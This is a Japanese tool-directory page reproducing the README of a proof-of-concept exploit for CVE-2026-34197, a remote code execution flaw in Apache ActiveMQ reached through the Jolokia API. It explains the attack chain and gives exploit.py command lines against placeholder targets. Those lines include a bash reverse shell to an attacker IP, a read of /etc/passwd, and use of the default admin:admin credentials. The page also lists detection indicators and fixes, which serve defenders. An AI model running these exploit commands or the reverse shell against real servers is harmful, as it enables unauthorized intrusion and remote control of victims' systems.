Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
ツール/GitHubGitHub/devsecurityspro/cve-2026-34197
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト学習と教育レッドチーミングラボと実践
GitHubdevsecurityspro/cve-2026-34197

CVE-2026-34197

# CVE-2026-34197 の概念実証エクスプロイト Jolokia API を介した Apache ActiveMQ の RCE に対する概念実証エクスプロイト。Python エクスプロイト、ペイロードテンプレート、テストおよび研究用の Docker ラボが含まれています。

リポジトリを見る
44ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2026-34197 — Apache ActiveMQ RCE via Jolokia API

説明

CVE-2026-34197 は、Apache ActiveMQ Classic におけるリモートコード実行(RCE)の脆弱性であり、攻撃者が Web コンソールに公開された Jolokia API を介して、サーバーのオペレーティングシステム上で任意のコマンドを実行できるようにします。

この脆弱性は 13 年以上前から存在しており、Jolokia(HTTP-JMX ブリッジ)、ActiveMQ の MBean、ネットワークコネクタ、VM トランスポートなど、複数のコンポーネント間の相互作用に起因します。

脆弱性情報

フィールド詳細
CVE IDCVE-2026-34197
タイプRCE(リモートコード実行)
CWECWE-20(不適切な入力検証)、CWE-94(コードインジェクション)
影響を受けるバージョンActiveMQ Classic < 5.19.4、6.0.0 — 6.2.2
パッチ適用済みバージョン5.19.4、6.2.3
必要な認証あり(デフォルト認証情報 admin:admin が一般的)
認証不要のバージョン6.0.0 — 6.1.1(CVE-2024-32114 による)
デフォルトポート8161(Web コンソール)

悪用メカニズム

攻撃チェーンは次のように機能します:

  1. 攻撃者は /api/jolokia/ に POST リクエストを送信し、ブローカーの MBean の addNetworkConnector オペレーションを呼び出します。
  2. 引数には、存在しないブローカーを参照する vm:// トランスポートを含む URI が含まれます。
  3. ActiveMQ はそのブローカーをその場で作成しようとし、リモート URL を指す brokerConfig パラメータを受け入れます。
  4. xbean: スキームは、リソースが Spring XML 設定ファイルであることを示します。
  5. Spring は XML で定義されたすべての Bean をインスタンス化します。これには Runtime.getRuntime().exec() を実行する Bean も含まれます。
  6. サーバー上で任意のコマンドが実行されます。
root@kitploit:~
攻撃者                            ActiveMQ(被害者)
   |                                    |
   |-- POST /api/jolokia/ ------------>|
   |   addNetworkConnector(            |
   |     vm://rce?brokerConfig=        |
   |     xbean:http://ATACANTE/x.xml)  |
   |                                    |
   |                                    |-- VM ブローカーを作成
   |                                    |-- x.xml をダウンロード
   |<-- GET /x.xml --------------------|
   |-- XML ペイロードで応答 ---------->|
   |                                    |-- Spring が Bean をインスタンス化
   |                                    |-- Runtime.exec(COMANDO)
   |                                    |

プロジェクト構成

root@kitploit:~
CVE-2026-34197/
├── README.md              # このファイル
├── exploit.py             # メインの PoC
├── payloads/
│   └── template.xml       # Spring XML ペイロードのテンプレート
├── docker/
│   └── docker-compose.yml # 脆弱なラボ環境
└── LICENSE

要件

  • Python 3.8+
  • モジュール: requests、http.server、argparse(標準ライブラリ)
  • ターゲットのポート 8161 へのネットワークアクセス
  • Docker と Docker Compose(オプション、ラボ用)
root@kitploit:~
pip install requests

使用方法

1. 脆弱な環境を起動する(オプション)

root@kitploit:~
cd docker
docker-compose up -d

これにより、脆弱な ActiveMQ Classic 5.18.6 が localhost:8161 で起動します。

2. エクスプロイトを実行する

root@kitploit:~
# デフォルト認証情報を使用した基本的な使用方法
python exploit.py -t http://OBJETIVO:8161 -l ATACANTE_IP -c "id"

# 認証情報を指定する
python exploit.py -t http://OBJETIVO:8161 -l ATACANTE_IP -c "whoami" -u admin -p admin

# ペイロード配信 HTTP サーバーのポートを指定する
python exploit.py -t http://OBJETIVO:8161 -l ATACANTE_IP -lp 9999 -c "cat /etc/passwd"

# 認証なしモード(ActiveMQ 6.0.0 - 6.1.1)
python exploit.py -t http://OBJETIVO:8161 -l ATACANTE_IP -c "id" --no-auth

# リバースシェル
python exploit.py -t http://OBJETIVO:8161 -l ATACANTE_IP -c "bash -i >& /dev/tcp/ATACANTE_IP/4444 0>&1"

パラメータ

パラメータ説明
-t, --targetターゲットのベース URL(例: http://10.0.0.1:8161)
-l, --lhostXML ペイロードを配信する攻撃者の IP
-lp, --lportローカル HTTP サーバーのポート(デフォルト: 8888)
-c, --commandターゲット上で実行するコマンド
-u, --userユーザー名(デフォルト: admin)
-p, --passwordパスワード(デフォルト: admin)
--no-auth認証情報を送信しない(バージョン 6.0.0 - 6.1.1 用)
--broker-nameブローカー名(デフォルト: localhost)

検出

ActiveMQ ブローカーのログに表示される指標:

root@kitploit:~
INFO  | Establishing network connection from vm://localhost to vm://rce?create=true&brokerConfig=xbean:http://X.X.X.X:8888/payload.xml
WARN  | Could not connect to remote URI: vm://rce?create=true&brokerConfig=xbean:http://X.X.X.X:8888/payload.xml

その他の指標:

  • ボディに addNetworkConnector を含む /api/jolokia/ への POST リクエスト
  • ActiveMQ プロセスから予期しないホストへの送信 HTTP 接続
  • ActiveMQ の Java プロセスによって生成された予期しない子プロセス

修復策

  • ActiveMQ Classic 5.19.4 または 6.2.3 にアップデートする
  • Web コンソールのデフォルト認証情報を変更する
  • ポート 8161 へのネットワークアクセスを制限する
  • brokerConfig=xbean:http を含む vm:// URI がないかブローカーのログを監視する

参考情報

  • NVD — CVE-2026-34197
  • Horizon3 — 技術分析
  • Apache ActiveMQ — セキュリティアドバイザリ
  • CVE-2024-32114 — 認証なしの Jolokia
  • CVE-2023-46604 — OpenWire RCE(CISA KEV)

作成者

作成者: KONDOR DEV SECURITY

Telegram

法的免責事項

この PoC は、教育およびセキュリティ研究の目的のみで提供されています。明示的な許可なくシステムに対してこのツールを使用することは違法です。作成者は、このツールの不正使用について一切の責任を負いません。

ライセンス

MIT — Copyright (c) 2026 KONDOR DEV SECURITY

ツールをダウンロード